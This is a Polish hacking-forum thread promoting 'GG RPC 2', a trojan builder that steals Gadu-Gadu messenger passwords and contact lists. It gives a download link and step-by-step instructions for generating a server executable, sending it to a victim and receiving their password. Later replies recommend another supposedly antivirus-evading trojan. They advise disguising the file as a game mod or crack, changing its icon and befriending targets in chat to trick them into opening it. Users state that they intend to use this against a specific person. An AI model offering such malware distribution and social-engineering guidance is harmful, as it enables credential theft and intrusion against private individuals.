GG RPC 2

lelek

Użytkownik
Dołączył
Marzec 14, 2007
Posty
3
A więc. Na początku pobieramy
Kod:
http://rapidshare.com/files/23384600/GG_RPC2.rar.html
Program prostu w obsłudze. Tworzymy serwer jak w przypadku wielu innych trojanów. Program przeznaczony jest do pobierania wszystkich haseł z kont i list kontaktów. Miłej zabawy ;]
 
3

31337

Gość
Hmm, spodziewałem się bonusów w tym progrmie, ale zawiodłem się =]
 

Dyndol

Użytkownik
Dołączył
Kwiecień 5, 2007
Posty
1
mam pytanie z kyórego gg mam wysłać plik exe z mojego czy z tego który jest serwerem??
 

lelek

Użytkownik
Dołączył
Marzec 14, 2007
Posty
3
Jak działa

Ustawiamy w zakładce NR GADU nr i hasło serwera, czyli gg, którego założyliśmy i nasz numer, na który przyjdą hasła. Następnie klikamy generuj. W folderze z GGRPC powinien utworzyc sie plik server.eve, który wysyłamy ofiarze. Kiedy go otworzy na nasz gg przyjdzie wiadomość z jego hasłem.
 
P

PawelSLU4

Gość
juz zaczynam testowac
smile.gif







---------------------------------------------------------------------
a wie ktos moze w jaki sposob moge zdobyc archiwum kogod do kogo niemam dostepu fizycznego??a ta osoba mi niewysle.(wiem ze pisalem juz to w innym temacie ale nikt nie pomogł)
 

0wn3r

Były Moderator
Dołączył
Marzec 10, 2007
Posty
1330
Originally posted by PawelSLU4
juz zaczynam testowac
smile.gif







---------------------------------------------------------------------
a wie ktos moze w jaki sposob moge zdobyc archiwum kogod do kogo niemam dostepu fizycznego??a ta osoba mi niewysle.(wiem ze pisalem juz to w innym temacie ale nikt nie pomogł)

Wysłać trojana np. Hamtaro mega(nie wykrywalny przez NOD32, Avast, kaspersky itp.) i sobie skopiować z jego dysku
<
 
P

PawelSLU4

Gość
Wysłać trojana np. Hamtaro mega(nie wykrywalny przez NOD32, Avast, kaspersky itp.) i sobie skopiować z jego dysku[/b]
ale jak wysłac zeby tego wira otworzyl??mam dostep do iego poczty ale on jej nieodbiera a jak odbiera to raz na dlugi czas i to niewszystko.
niewysle mu jako niespodzianke bo z soba niegadamy.a wiec niewiem jak moge podrzucic ten plik.
 

0wn3r

Były Moderator
Dołączył
Marzec 10, 2007
Posty
1330
Originally posted by PawelSLU4
<div class='quotetop'>CYTAT
Wysłać trojana np. Hamtaro mega(nie wykrywalny przez NOD32, Avast, kaspersky itp.) i sobie skopiować z jego dysku
ale jak wysłac zeby tego wira otworzyl??mam dostep do iego poczty ale on jej nieodbiera a jak odbiera to raz na dlugi czas i to niewszystko.
niewysle mu jako niespodzianke bo z soba niegadamy.a wiec niewiem jak moge podrzucic ten plik.[/b][/quote]

To nie ma innego sposobu
<
 
P

PawelSLU4

Gość
ale tak wymyslilem zeby to wyslac na jego forum on to napewno pobiezre, bo bedzie chcial sprawdzic ale niewysle mu tego jako plik .exe bo to jest podejrzliwe ale gdyby napisac ze jest to jakis mod do gry to moze by i wzial on ma nortona 2004 wiec na 100% nieznajdzie mu tego wirusa.a jak mozna zmienic ikone pliku .exe??

sproobuje mu to wysłac
smile.gif
 

lelek

Użytkownik
Dołączył
Marzec 14, 2007
Posty
3
LOL

Czy wy myślicie że włamiecie się bez wysyłania zadnego pliku? Z waszym poziomem zaawansowania zostaje tylko to. Serwer generuje sie w tym folderze co program. Jeżeli zmieniasz ikone serwer wygeneruje sie w tym folderze co ikony są.
 

DWD

Użytkownik
Dołączył
Kwiecień 30, 2007
Posty
1
Originally posted by PawelSLU4
<div class='quotetop'>CYTAT
Wysłać trojana np. Hamtaro mega(nie wykrywalny przez NOD32, Avast, kaspersky itp.) i sobie skopiować z jego dysku
ale jak wysłac zeby tego wira otworzyl??mam dostep do iego poczty ale on jej nieodbiera a jak odbiera to raz na dlugi czas i to niewszystko.
niewysle mu jako niespodzianke bo z soba niegadamy.a wiec niewiem jak moge podrzucic ten plik.[/b][/quote]

pomyśl złap ofiare na czacie jakimś nie musi wiedzieć że ty to ty,poznaj jej zainteresowania
dowiedz się czego potrzebuje,pamiętaj pliki możesz zmieniać(nie zmieniaj rozszerzeń)np crak czy coś takiego spolszczenie zdaj się na ciekawośc ofiary,glupote i swój spryt
peace. GG RPC jest wykrywalny ale stasza wersja nie korzystaj z serwerów do wymiany danych i dawaj linki a pozatym masz GOOGLE
 
Do góry Bottom